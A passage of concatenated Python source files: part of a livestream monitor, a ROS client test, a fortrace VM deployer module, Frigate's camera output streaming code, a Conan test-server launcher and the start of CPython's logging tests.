raise
except Exception as exc:
start_watchdog()
raise RuntimeError("Exception encountered during main loop processing") from exc
finally:
print("number of active children: " + str(len(mp.active_children()))) # side effect: joins finished tasks
print("number of known lives: " + str(len(lives)))
counters = {'progress': {}, 'status': {}, 'meta': 0, 'rawmeta': 0}
for video in lives.values():
counters['status'][video.status] = counters['status'].setdefault(video.status, 0) + 1
counters['progress'][video.progress] = counters['progress'].setdefault(video.progress, 0) + 1
counters['meta'] += (video.meta is not None)
counters['rawmeta'] += (video.rawmeta is not None)
print("video states:")
for status, count in counters['status'].items():
print(f" number with video state {status}:", count)
print("progress states:")
for progress, count in counters['progress'].items():
print(f" number with progress state {progress}:", count)
print("number of meta objects:", counters['meta'])
print("number of rawmeta objects:", counters['rawmeta'])
print("number of tracked pid groups: " + str(len(pids)))
print(end='', flush=True)
statuslog.flush()
|
client_test.py
|
#!/usr/bin/env python
import sys
import time
import rospy
import threading
from pcu_common_utils.AcquireRessource import AcquireRessource
from pcu_sl_interface.srv import SetState
from pcu_sl_interface.msg import ControllerState, JointsVector
class Node:
def __init__(self):
self.sema = threading.Semaphore(0)
self.ar = AcquireRessource("/SL_RT_CORE/acquire")
self.srv_set_state = rospy.ServiceProxy("/SL_RT_CORE/set_state", SetState)
print("waiting for service...")
self.srv_set_state.wait_for_service()
print("ok!")
self.qd_pub = rospy.Publisher("/SL_RT_CORE/qd_set", JointsVector, queue_size=1)
def aq(self):
print("Aquiring Core")
if self.ar.acquire(1.0):
print("Aquired!")
else:
print("timeout!")
def run(self):
#self.done = false
self.setState(ControllerState.STANDBY)
self.aq()
self.setState(ControllerState.TRA_VELOCITY)
rate = rospy.Rate(10)
c = 0
#time.sleep(2)
while self.ar.is_acquired and not rospy.is_shutdown():
c += 0.1
jv = JointsVector()
jv.joint_data = [c, c*3.3]
self.qd_pub.publish(jv)
rate.sleep()
self.ar.release()
print("Broken")
def setState(self, nr):
cs = ControllerState()
cs.state = nr
if not self.srv_set_state(cs).success:
print("Failed to set State.")
else:
print("Setting state ok.")
rospy.init_node('client_test', anonymous=True)
node = Node()
t = threading.Thread(target=node.run)
t.start()
#node.run()
rospy.spin()
"""
id = generate_unique_id()
# Sends id to B using an action or a service
bond = bondpy.Bond("example_bond_topic", id)
bond.start()
if not bond.wait_until_formed(rospy.Duration(1.0)):
raise Exception('Bond could not be formed')
# ... do things with B ...
bond.wait_until_broken()
print "B has broken the bond"
"""
|
deployer.py
|
from __future__ import absolute_import
import subprocess
import inspect
import threading
from time import sleep
from fortrace.application.application import ApplicationVmmSide
from fortrace.application.application import ApplicationVmmSideCommands
from fortrace.application.application import ApplicationGuestSide
from fortrace.application.application import ApplicationGuestSideCommands
from fortrace.utility.line import lineno
###############################################################################
# Host side implementation
###############################################################################
class DeployerVmmSide(ApplicationVmmSide):
"""
This class is a remote control on the host-side to
install new programs and change their configuration.
"""
def __init__(self, guest_obj, args):
"""Set default attribute values only.
@param guest_obj: The guest on which this application is running. (will be inserted from guest::application())
@param args: containing
logger: Logger name for logging.
"""
try:
super(DeployerVmmSide, self).__init__(guest_obj, args)
self.logger.info("function: DeployerVmmSide::__init__")
except Exception as e:
raise Exception(lineno() + " Error: DeployerVmmSide::__init__ "
+ self.guest_obj.guestname + " " + str(e))
def deploy(self, iso_path):
"""Deploy a new program"""
try:
self.logger.info("DeployerVmmSide::deploy inserting CD image")
self.guest_obj.insertCD(iso_path)
# - wait a few seconds, giving the guest os enough time to mount the cd volume
sleep(5)
self.logger.info("function: DeployerVmmSide::deploy insertion done, execute deployment")
self.guest_obj.send("application " + "deployer " + " deploy ")
self.is_busy = True
except Exception as e:
raise Exception("error DeployerVmmSide::open: " + str(e))
def open(self):
"""
Abstact method, which all child classes have to overwrite.
"""
raise NotImplementedError
def close(self):
"""
Abstact method, which all child classes have to overwrite.
Close an instance of an application.
"""
raise NotImplementedError
###############################################################################
# Commands to parse on host side
###############################################################################
class DeployerVmmSideCommands(ApplicationVmmSideCommands):
"""
Class with all commands for <Deployer> which will be received from the agent on the guest.
Static only.
"""
@staticmethod
def commands(guest_obj, cmd):
# cmd[0] = win_id; cmd[1] = state
guest_obj.logger.info("function: DeployerVmmSideCommands::commands")
module_name = "deployer"
guest_obj.logger.debug("DeployerVmmSideCommands::commands: " + cmd)
try:
if "ready" == cmd:
guest_obj.logger.debug("in ready")
guest_obj.logger.info(module_name + " is_ready = true")
deployObj = guest_obj.applicationWindow[module_name][0]
deployObj.is_ready = True
deployObj.is_busy = False
if "error" == cmd:
guest_obj.logger.debug("in error")
guest_obj.logger.info(module_name + " has_error = True")
deployObj = guest_obj.applicationWindow[module_name][0]
deployObj.has_error = True
except Exception as e:
raise Exception(module_name + "_host_side_commands::commands " + str(e))
###############################################################################
# Guest side implementation
###############################################################################
class DeployerGuestSide(ApplicationGuestSide):
"""<Deployer> implementation of the guest side.
Usually Windows, Linux guest's
class attributes
window_id - The ID for the opened object
"""
def __init__(self, agent_obj, logger):
super(DeployerGuestSide, self).__init__(agent_obj, logger)
try:
self.module_name = "deployer"
self.agent_object = agent_obj
except Exception as e:
raise Exception("Error in " + self.__class__.__name__ +
": " + str(e))
def deploy(self, args):
"""
Starts the deployment process by executing the setup.py from the cd drive.
return:
Send to the host in the known to be good state:
'application <Deployer> window_id open'.
'application <Deployer> window_id ready'.
in the error state:
'application <Deployer> window_id error'.
"""
try:
arguments = args.split(" ")
# installationPath = arguments[0]
self.logger.info("function: Deployer::open")
self.logger.debug("Deployment process starts now -> execute setup.py")
if self.agent_object.operatingSystem == "windows":
subprocess.call(['python', 'D:\\\\setup.py'])
elif self.agent_object.operatingSystem == "linux":
subprocess.call(['python', '/media/fortrace/CDROM/setup.py'])
else:
raise Exception(
lineno() + " Error: DeployerGuestSide::__deploy__ unkown operating system: " + self.agent_object.operatingSystem)
self.agent_object.send("application " + self.module_name + " ready")
except Exception as e:
self.agent_object.send("application " + self.module_name + " error")
self.logger.error("Deployer::open: " + str(e))
return
def open(self):
"""
Abstact method, which all child classes have to overwrite.
"""
raise NotImplementedError
def close(self):
"""
Abstact method, which all child classes have to overwrite.
"""
raise NotImplementedError
###############################################################################
# Commands to parse on guest side
###############################################################################
class DeployerGuestSideCommands(ApplicationGuestSideCommands):
"""
Class with all commands for one application.
call the ask method for an object. The call will be done by a thread, so if the timeout is
reached, the open application will be closed and opened again.
Static only.
"""
@staticmethod
def commands(agent_obj, obj, cmd): # commands(obj, cmd) obj from list objlist[window_id] win id in cmd[1]?
try:
agent_obj.logger.info("static function DeployerGuestSideCommands::commands")
agent_obj.logger.debug("command to parse: " + cmd)
com = cmd.split(" ")
if len(com) > 3:
args = " ".join(com[3:])
module = com[0] # inspect.stack()[-1][1].split(".")[0]
window_id = com[1]
method_string = com[2]
method_found = False
methods = inspect.getmembers(obj, predicate=inspect.ismethod)
for method in methods:
# method[0] will now contain the name of the method
# method[1] will contain the value
if method[0] == method_string:
# start methods as threads
method_found = True
agent_obj.logger.debug("method to call: " + method[0] + "(" + args + ")")
agent_obj.logger.debug("args")
tmp_thread = threading.Thread(target=method[1], args=(args,))
agent_obj.logger.debug("thread is defined")
tmp_thread.start()
agent_obj.logger.debug("thread started")
tmp_thread.join(600) # Wait until the thread is completed
if tmp_thread.is_alive():
# process does not respond, kill it
agent_obj.logger.error("thread is alive... time outed")
agent_obj.logger.info("DeployerGuestSideCommands::commands: Close all open windows")
# TODO: kill setup.py
# set a crushed flag.
obj.is_opened = False
obj.is_busy = False
obj.has_error = True
agent_obj.logger.info("application " + module + " error")
agent_obj.send("application " + module + " error")
if not method_found:
raise Exception("Method " + method_string + " is not defined!")
except Exception as e:
raise Exception("Error in DeployerGuestSideCommands::commands " + str(e))
|
output.py
|
import datetime
import glob
import logging
import math
import multiprocessing as mp
import queue
import signal
import subprocess as sp
import threading
from multiprocessing import shared_memory
from wsgiref.simple_server import make_server
import cv2
import numpy as np
from setproctitle import setproctitle
from ws4py.server.wsgirefserver import (
WebSocketWSGIHandler,
WebSocketWSGIRequestHandler,
WSGIServer,
)
from ws4py.server.wsgiutils import WebSocketWSGIApplication
from ws4py.websocket import WebSocket
from frigate.config import BirdseyeModeEnum, FrigateConfig
from frigate.util import SharedMemoryFrameManager, copy_yuv_to_position, get_yuv_crop
logger = logging.getLogger(__name__)
class FFMpegConverter:
def __init__(self, in_width, in_height, out_width, out_height, quality):
ffmpeg_cmd = f"ffmpeg -f rawvideo -pix_fmt yuv420p -video_size {in_width}x{in_height} -i pipe: -f mpegts -s {out_width}x{out_height} -codec:v mpeg1video -q {quality} -bf 0 pipe:".split(
" "
)
self.process = sp.Popen(
ffmpeg_cmd,
stdout=sp.PIPE,
stderr=sp.DEVNULL,
stdin=sp.PIPE,
start_new_session=True,
)
def write(self, b):
self.process.stdin.write(b)
def read(self, length):
try:
return self.process.stdout.read1(length)
except ValueError:
return False
def exit(self):
self.process.terminate()
try:
self.process.communicate(timeout=30)
except sp.TimeoutExpired:
self.process.kill()
self.process.communicate()
class BroadcastThread(threading.Thread):
def __init__(self, camera, converter, websocket_server):
super(BroadcastThread, self).__init__()
self.camera = camera
self.converter = converter
self.websocket_server = websocket_server
def run(self):
while True:
buf = self.converter.read(65536)
if buf:
manager = self.websocket_server.manager
with manager.lock:
websockets = manager.websockets.copy()
ws_iter = iter(websockets.values())
for ws in ws_iter:
if (
not ws.terminated
and ws.environ["PATH_INFO"] == f"/{self.camera}"
):
try:
ws.send(buf, binary=True)
except:
pass
elif self.converter.process.poll() is not None:
break
class BirdsEyeFrameManager:
def __init__(self, config, frame_manager: SharedMemoryFrameManager):
self.config = config
self.mode = config.birdseye.mode
self.frame_manager = frame_manager
width = config.birdseye.width
height = config.birdseye.height
self.frame_shape = (height, width)
self.yuv_shape = (height * 3 // 2, width)
self.frame = np.ndarray(self.yuv_shape, dtype=np.uint8)
# initialize the frame as black and with the frigate logo
self.blank_frame = np.zeros(self.yuv_shape, np.uint8)
self.blank_frame[:] = 128
self.blank_frame[0 : self.frame_shape[0], 0 : self.frame_shape[1]] = 16
# find and copy the logo on the blank frame
logo_files = glob.glob("/opt/frigate/frigate/birdseye.png")
frigate_logo = None
if len(logo_files) > 0:
frigate_logo = cv2.imread(logo_files[0], cv2.IMREAD_UNCHANGED)
if not frigate_logo is None:
transparent_layer = frigate_logo[:, :, 3]
y_offset = height // 2 - transparent_layer.shape[0] // 2
x_offset = width // 2 - transparent_layer.shape[1] // 2
self.blank_frame[
y_offset : y_offset + transparent_layer.shape[1],
x_offset : x_offset + transparent_layer.shape[0],
] = transparent_layer
else:
logger.warning("Unable to read frigate logo")
self.frame[:] = self.blank_frame
self.cameras = {}
for camera, settings in self.config.cameras.items():
# precalculate the coordinates for all the channels
y, u1, u2, v1, v2 = get_yuv_crop(
settings.frame_shape_yuv,
(
0,
0,
settings.frame_shape[1],
settings.frame_shape[0],
),
)
self.cameras[camera] = {
"last_active_frame": 0.0,
"current_frame": 0.0,
"layout_frame": 0.0,
"channel_dims": {
"y": y,
"u1": u1,
"u2": u2,
"v1": v1,
"v2": v2,
},
}
self.camera_layout = []
self.active_cameras = set()
self.layout_dim = 0
self.last_output_time = 0.0
def clear_frame(self):
logger.debug(f"Clearing the birdseye frame")
self.frame[:] = self.blank_frame
def copy_to_position(self, position, camera=None, frame_time=None):
if camera is None:
frame = None
channel_dims = None
else:
try:
frame = self.frame_manager.get(
f"{camera}{frame_time}", self.config.cameras[camera].frame_shape_yuv
)
except FileNotFoundError:
# TODO: better frame management would prevent this edge case
logger.warning(
f"Unable to copy frame {camera}{frame_time} to birdseye."
)
return
channel_dims = self.cameras[camera]["channel_dims"]
copy_yuv_to_position(
self.frame,
self.layout_offsets[position],
self.layout_frame_shape,
frame,
channel_dims,
)
def camera_active(self, object_box_count, motion_box_count):
if self.mode == BirdseyeModeEnum.continuous:
return True
if (
self.mode == BirdseyeModeEnum.motion
and object_box_count + motion_box_count > 0
):
return True
if self.mode == BirdseyeModeEnum.objects and object_box_count > 0:
return True
def update_frame(self):
# determine how many cameras are tracking objects within the last 30 seconds
active_cameras = set(
[
cam
for cam, cam_data in self.cameras.items()
if cam_data["last_active_frame"] > 0
and cam_data["current_frame"] - cam_data["last_active_frame"] < 30
]
)
# if there are no active cameras
if len(active_cameras) == 0:
# if the layout is already cleared
if len(self.camera_layout) == 0:
return False
# if the layout needs to be cleared
else:
self.camera_layout = []
self.layout_dim = 0
self.clear_frame()
return True
# calculate layout dimensions
layout_dim = math.ceil(math.sqrt(len(active_cameras)))
# reset the layout if it needs to be different
if layout_dim != self.layout_dim:
logger.debug(f"Changing layout size from {self.layout_dim} to {layout_dim}")
self.layout_dim = layout_dim
self.camera_layout = [None] * layout_dim * layout_dim
# calculate resolution of each position in the layout
self.layout_frame_shape = (
self.frame_shape[0] // layout_dim, # height
self.frame_shape[1] // layout_dim, # width
)
self.clear_frame()
for cam_data in self.cameras.values():
cam_data["layout_frame"] = 0.0
self.active_cameras = set()
self.layout_offsets = []
# calculate the x and y offset for each position in the layout
for position in range(0, len(self.camera_layout)):
y_offset = self.layout_frame_shape[0] * math.floor(
position / self.layout_dim
)
x_offset = self.layout_frame_shape[1] * (position % self.layout_dim)
self.layout_offsets.append((y_offset, x_offset))
removed_cameras = self.active_cameras.difference(active_cameras)
added_cameras = active_cameras.difference(self.active_cameras)
self.active_cameras = active_cameras
# update each position in the layout
for position, camera in enumerate(self.camera_layout, start=0):
# if this camera was removed, replace it or clear it
if camera in removed_cameras:
# if replacing this camera with a newly added one
if len(added_cameras) > 0:
added_camera = added_cameras.pop()
self.camera_layout[position] = added_camera
self.copy_to_position(
position,
added_camera,
self.cameras[added_camera]["current_frame"],
)
self.cameras[added_camera]["layout_frame"] = self.cameras[
added_camera
]["current_frame"]
# if removing this camera with no replacement
else:
self.camera_layout[position] = None
self.copy_to_position(position)
removed_cameras.remove(camera)
# if an empty spot and there are cameras to add
elif camera is None and len(added_cameras) > 0:
added_camera = added_cameras.pop()
self.camera_layout[position] = added_camera
self.copy_to_position(
position,
added_camera,
self.cameras[added_camera]["current_frame"],
)
self.cameras[added_camera]["layout_frame"] = self.cameras[added_camera][
"current_frame"
]
# if not an empty spot and the camera has a newer frame, copy it
elif (
not camera is None
and self.cameras[camera]["current_frame"]
!= self.cameras[camera]["layout_frame"]
):
self.copy_to_position(
position, camera, self.cameras[camera]["current_frame"]
)
self.cameras[camera]["layout_frame"] = self.cameras[camera][
"current_frame"
]
return True
def update(self, camera, object_count, motion_count, frame_time, frame) -> bool:
# update the last active frame for the camera
self.cameras[camera]["current_frame"] = frame_time
if self.camera_active(object_count, motion_count):
self.cameras[camera]["last_active_frame"] = frame_time
now = datetime.datetime.now().timestamp()
# limit output to 10 fps
if (now - self.last_output_time) < 1 / 10:
return False
# if the frame was updated or the fps is too low, send frame
if self.update_frame() or (now - self.last_output_time) > 1:
self.last_output_time = now
return True
return False
def output_frames(config: FrigateConfig, video_output_queue):
threading.current_thread().name = f"output"
setproctitle(f"frigate.output")
stop_event = mp.Event()
def receiveSignal(signalNumber, frame):
stop_event.set()
signal.signal(signal.SIGTERM, receiveSignal)
signal.signal(signal.SIGINT, receiveSignal)
frame_manager = SharedMemoryFrameManager()
previous_frames = {}
# start a websocket server on 8082
WebSocketWSGIHandler.http_version = "1.1"
websocket_server = make_server(
"127.0.0.1",
8082,
server_class=WSGIServer,
handler_class=WebSocketWSGIRequestHandler,
app=WebSocketWSGIApplication(handler_cls=WebSocket),
)
websocket_server.initialize_websockets_manager()
websocket_thread = threading.Thread(target=websocket_server.serve_forever)
converters = {}
broadcasters = {}
for camera, cam_config in config.cameras.items():
width = int(
cam_config.live.height
* (cam_config.frame_shape[1] / cam_config.frame_shape[0])
)
converters[camera] = FFMpegConverter(
cam_config.frame_shape[1],
cam_config.frame_shape[0],
width,
cam_config.live.height,
cam_config.live.quality,
)
broadcasters[camera] = BroadcastThread(
camera, converters[camera], websocket_server
)
if config.birdseye.enabled:
converters["birdseye"] = FFMpegConverter(
config.birdseye.width,
config.birdseye.height,
config.birdseye.width,
config.birdseye.height,
config.birdseye.quality,
)
broadcasters["birdseye"] = BroadcastThread(
"birdseye", converters["birdseye"], websocket_server
)
websocket_thread.start()
for t in broadcasters.values():
t.start()
birdseye_manager = BirdsEyeFrameManager(config, frame_manager)
while not stop_event.is_set():
try:
(
camera,
frame_time,
current_tracked_objects,
motion_boxes,
regions,
) = video_output_queue.get(True, 10)
except queue.Empty:
continue
frame_id = f"{camera}{frame_time}"
frame = frame_manager.get(frame_id, config.cameras[camera].frame_shape_yuv)
# send camera frame to ffmpeg process if websockets are connected
if any(
ws.environ["PATH_INFO"].endswith(camera) for ws in websocket_server.manager
):
# write to the converter for the camera if clients are listening to the specific camera
converters[camera].write(frame.tobytes())
# update birdseye if websockets are connected
if config.birdseye.enabled and any(
ws.environ["PATH_INFO"].endswith("birdseye")
for ws in websocket_server.manager
):
if birdseye_manager.update(
camera,
len(current_tracked_objects),
len(motion_boxes),
frame_time,
frame,
):
converters["birdseye"].write(birdseye_manager.frame.tobytes())
if camera in previous_frames:
frame_manager.delete(f"{camera}{previous_frames[camera]}")
previous_frames[camera] = frame_time
while not video_output_queue.empty():
(
camera,
frame_time,
current_tracked_objects,
motion_boxes,
regions,
) = video_output_queue.get(True, 10)
frame_id = f"{camera}{frame_time}"
frame = frame_manager.get(frame_id, config.cameras[camera].frame_shape_yuv)
frame_manager.delete(frame_id)
for c in converters.values():
c.exit()
for b in broadcasters.values():
b.join()
websocket_server.manager.close_all()
websocket_server.manager.stop()
websocket_server.manager.join()
websocket_server.shutdown()
websocket_thread.join()
logger.info("exiting output process...")
|
server_launcher.py
|
#!/usr/bin/python
import os
import shutil
import time
from conans import SERVER_CAPABILITIES
from conans.paths import SimplePaths
from conans.server.conf import get_server_store
from conans.server.crypto.jwt.jwt_credentials_manager import JWTCredentialsManager
from conans.server.crypto.jwt.jwt_updown_manager import JWTUpDownAuthManager
from conans.server.migrate import migrate_and_get_server_config
from conans.server.rest.server import ConanServer
from conans.server.service.authorize import BasicAuthenticator, BasicAuthorizer
from conans.test.utils.test_files import temp_folder
from conans.util.files import mkdir
from conans.util.log import logger
TESTING_REMOTE_PRIVATE_USER = "private_user"
TESTING_REMOTE_PRIVATE_PASS = "private_pass"
class TestServerLauncher(object):
port = 0
def __init__(self, base_path=None, read_permissions=None,
write_permissions=None, users=None, base_url=None, plugins=None,
server_version=None,
min_client_compatible_version=None,
server_capabilities=None):
plugins = plugins or []
if not base_path:
base_path = temp_folder()
if not os.path.exists(base_path):
raise Exception("Base path not exist! %s")
# Define storage_folder, if not, it will be read from conf file and
# pointed to real user home
self.storage_folder = os.path.join(base_path, ".conan_server", "data")
mkdir(self.storage_folder)
server_config = migrate_and_get_server_config(base_path, self.storage_folder)
if server_capabilities is None:
server_capabilities = set(SERVER_CAPABILITIES)
if TestServerLauncher.port == 0:
TestServerLauncher.port = server_config.port
# Encode and Decode signature for Upload and Download service
updown_auth_manager = JWTUpDownAuthManager(server_config.updown_secret,
server_config.authorize_timeout)
base_url = base_url or server_config.public_url
self.server_store = get_server_store(server_config.disk_storage_path,
base_url, updown_auth_manager)
# Prepare some test users
if not read_permissions:
read_permissions = server_config.read_permissions
read_permissions.append(("private_library/1.0.0@private_user/testing", "*"))
read_permissions.append(("*/*@*/*", "*"))
if not write_permissions:
write_permissions = server_config.write_permissions
if not users:
users = dict(server_config.users)
users[TESTING_REMOTE_PRIVATE_USER] = TESTING_REMOTE_PRIVATE_PASS
authorizer = BasicAuthorizer(read_permissions, write_permissions)
authenticator = BasicAuthenticator(users)
credentials_manager = JWTCredentialsManager(server_config.jwt_secret,
server_config.jwt_expire_time)
logger.debug("Storage path: %s" % self.storage_folder)
self.port = TestServerLauncher.port
self.paths = SimplePaths(server_config.disk_storage_path)
self.ra = ConanServer(self.port, credentials_manager, updown_auth_manager,
authorizer, authenticator, self.server_store,
server_version, min_client_compatible_version,
server_capabilities)
for plugin in plugins:
self.ra.api_v1.install(plugin)
self.ra.api_v2.install(plugin)
def start(self, daemon=True):
"""from multiprocessing import Process
self.p1 = Process(target=ra.run, kwargs={"host": "0.0.0.0"})
self.p1.start()
self.p1"""
import threading
class StoppableThread(threading.Thread):
"""Thread class with a stop() method. The thread itself has to check
regularly for the stopped() condition."""
def __init__(self, *args, **kwargs):
super(StoppableThread, self).__init__(*args, **kwargs)
self._stop = threading.Event()
def stop(self):
self._stop.set()
def stopped(self):
return self._stop.isSet()
self.t1 = StoppableThread(target=self.ra.run, kwargs={"host": "0.0.0.0", "quiet": True})
self.t1.daemon = daemon
self.t1.start()
time.sleep(1)
def stop(self):
self.ra.root_app.close()
self.t1.stop()
def clean(self):
if os.path.exists(self.storage_folder):
try:
shutil.rmtree(self.storage_folder)
except:
print("Can't clean the test server data, probably a server process is still opened")
if __name__ == "__main__":
server = TestServerLauncher()
server.start(daemon=False)
|
test_logging.py
|
# Copyright 2001-2017 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2017 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import configparser
import datetime
import pathlib
import pickle
import io
import gc
import json
import os
import queue
import random
import re
import signal
import socket
import struct
import sys
import tempfile
from test.support.script_helper import assert_python_ok, assert_python_failure
from test import support
import textwrap
import threading
import time
import unittest
import warnings
import weakref
import asyncore
from http.server import HTTPServer, BaseHTTPRequestHandler
import smtpd
from urllib.parse import urlparse, parse_qs
from socketserver import (ThreadingUDPServer, DatagramRequestHandler,
ThreadingTCPServer, StreamRequestHandler)
try:
import win32evtlog, win32evtlogutil, pywintypes
except ImportError:
win32evtlog = win32evtlogutil = pywintypes = None
try:
import zlib
except ImportError:
pass
class BaseTest(unittest.TestCase):
"""Base class for logging tests."""
log_format = "%(name)s -> %(levelname)s: %(message)s"
expected_log_pat = r"^([\w.]+) -> (\w+): (\d+)$"
message_num = 0
def setUp(self):
"""Setup the default logging stream to an internal StringIO instance,
so that we can examine log output as we want."""
self._threading_key = support.threading_setup()
logger_dict = logging.getLogger().manager.loggerDict
logging._acquireLock()
try:
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.saved_loggers = saved_loggers = logger_dict.copy()
self.saved_name_to_level = logging._nameToLevel.copy()
self.saved_level_to_name = logging._levelToName.copy()
self.logger_states = logger_states = {}
for name in saved_loggers:
logger_states[name] = getattr(saved_loggers[name],
'disabled', None)
finally:
logging._releaseLock()
# Set two unused loggers
self.logger1 = logging.getLogger("\xab\xd7\xbb")
self.logger2 = logging.getLogger("\u013f\u00d6\u0047")
self.root_logger = logging.getLogger("")
self.original_logging_level = self.root_logger.getEffectiveLevel()
self.stream = io.StringIO()
self.root_logger.setLevel(logging.DEBUG)
self.root_hdlr = logging.StreamHandler(self.stream)
self.root_formatter = logging.Formatter(self.log_format)
self.root_hdlr.setFormatter(self.root_formatter)
if self.logger1.hasHandlers():
hlist = self.logger1.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
if self.logger2.hasHandlers():
hlist = self.logger2.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
self.root_logger.addHandler(self.root_hdlr)
self.assertTrue(self.logger1.hasHandlers())
self.assertTrue(self.logger2.hasHandlers())
def tearDown(self):
"""Remove our logging stream, and restore the original logging
level."""
self.stream.close()
self.root_logger.removeHandler(self.root_hdlr)
while self.root_logger.handlers:
h = self.root_logger.handlers[0]
self.root_logger.removeHandler(h)
h.close()
self.root_logger.setLevel(self.original_logging_level)
logging._acquireLock()
try:
logging._levelToName.clear()
logging._levelToName.update(self.saved_level_to_name)
logging._nameToLevel.clear()
logging._nameToLevel.update(self.saved_name_to_level)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
manager = logging.getLogger().manager
manager.disable = 0
loggerDict = manager.loggerDict
loggerDict.clear()
loggerDict.update(self.saved_loggers)
logger_states = self.logger_states
for name in self.logger_states:
if logger_states[name] is not None:
self.saved_loggers[name].disabled = logger_states[name]
finally:
logging._releaseLock()
self.doCleanups()
support.threading_cleanup(*self._threading_key)
def assert_log_lines(self, expected_values, stream=None, pat=None):
"""Match the collected log lines against the regular expression
self.expected_log_pat, and compare the extracted group values to
the expected_values list of tuples."""
stream = stream or self.stream
pat = re.compile(pat or self.expected_log_pat)
actual_lines = stream.getvalue().splitlines()
self.assertEqual(len(actual_lines), len(expected_values))
for actual, expected in zip(actual_lines, expected_values):
match = pat.search(actual)
if not match:
self.fail("Log line does not match expected pattern:\n" +
actual)
self.assertEqual(tuple(match.groups()), expected)
s = stream.read()
if s:
self.fail("Remaining output at end of log stream:\n" + s)
def next_message(self):
"""Generate a message consisting solely of an auto-incrementing
integer."""
self.message_num += 1
return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
"""Test builtin levels and their inheritance."""
def test_flat(self):
# Logging levels in a flat logger namespace.
m = self.next_message
ERR = logging.getLogger("ERR")
ERR.setLevel(logging.ERROR)
INF = logging.LoggerAdapter(logging.getLogger("INF"), {})
INF.setLevel(logging.INFO)
DEB = logging.getLogger("DEB")
DEB.setLevel(logging.DEBUG)
# These should log.
ERR.log(logging.CRITICAL, m())
ERR.error(m())
INF.log(logging.CRITICAL, m())
INF.error(m())
INF.warning(m())
INF.info(m())
DEB.log(logging.CRITICAL, m())
DEB.error(m())
DEB.warning(m())
DEB.info(m())
DEB.debug(m())
# These should not log.
ERR.warning(m())
ERR.info(m())
ERR.debug(m())
INF.debug(m())
self.assert_log_lines([
('ERR', 'CRITICAL', '1'),
('ERR', 'ERROR', '2'),
('INF', 'CRITICAL', '3'),
('INF', 'ERROR', '4'),
('INF', 'WARNING', '5'),
('INF', 'INFO', '6'),
('DEB', 'CRITICAL', '7'),
('DEB', 'ERROR', '8'),
('DEB', 'WARNING', '9'),
('DEB', 'INFO', '10'),
('DEB', 'DEBUG', '11'),
])
def test_nested_explicit(self):
# Logging levels in a nested namespace, all explicitly set.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
# These should log.
INF_ERR.log(logging.CRITICAL, m())
INF_ERR.error(m())
# These should not log.
INF_ERR.warning(m())
INF_ERR.info(m())
INF_ERR.debug(m())
self.assert_log_lines([
('INF.ERR', 'CRITICAL', '1'),
('INF.ERR', 'ERROR', '2'),
])
def test_nested_inherited(self):
# Logging levels in a nested namespace, inherited from parent loggers.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
INF_UNDEF = logging.getLogger("INF.UNDEF")
INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
UNDEF = logging.getLogger("UNDEF")
# These should log.
INF_UNDEF.log(logging.CRITICAL, m())
INF_UNDEF.error(m())
INF_UNDEF.warning(m())
INF_UNDEF.info(m())
INF_ERR_UNDEF.log(logging.CRITICAL, m())
INF_ERR_UNDEF.error(m())
# These should not log.
INF_UNDEF.debug(m())
INF_ERR_UNDEF.warning(m())
INF_ERR_UNDEF.info(m())
INF_ERR_UNDEF.debug(m())
self.assert_log_lines([
('INF.UNDEF', 'CRITICAL', '1'),
('INF.UNDEF', 'ERROR', '2'),
('INF.UNDEF', 'WARNING', '3'),
('INF.UNDEF', 'INFO', '4'),
('INF.ERR.UNDEF', 'CRITICAL', '5'),
('INF.ERR.UNDEF', 'ERROR', '6'),
])
def test_nested_with_virtual_parent(self):
# Logging levels when some parent does not exist yet.
m = self.next_message
INF = logging.getLogger("INF")
GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
CHILD = logging.getLogger("INF.BADPARENT")
INF.setLevel(logging.INFO)
# These should log.
GRANDCHILD.log(logging.FATAL, m())
GRANDCHILD.info(m())
CHILD.log(logging.FATAL, m())
CHILD.info(m())
# These should not log.
GRANDCHILD.debug(m())
CHILD.debug(m())
self.assert_log_lines([
('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
('INF.BADPARENT.UNDEF', 'INFO', '2'),
('INF.BADPARENT', 'CRITICAL', '3'),
('INF.BADPARENT', 'INFO', '4'),
])
def test_regression_22386(self):
"""See issue #22386 for more information."""
self.assertEqual(logging.getLevelName('INFO'), logging.INFO)
self.assertEqual(logging.getLevelName(logging.INFO), 'INFO')
def test_get_level_name(self):
"""Test getLevelName returns level constant."""
# NOTE(flaper87): Bug #1517
self.assertEqual(logging.getLevelName('NOTSET'), 0)
self.assertEqual(logging.getLevelName('DEBUG'), 10)
self.assertEqual(logging.getLevelName('INFO'), 20)
self.assertEqual(logging.getLevelName('WARN'), 30)
self.assertEqual(logging.getLevelName('WARNING'), 30)
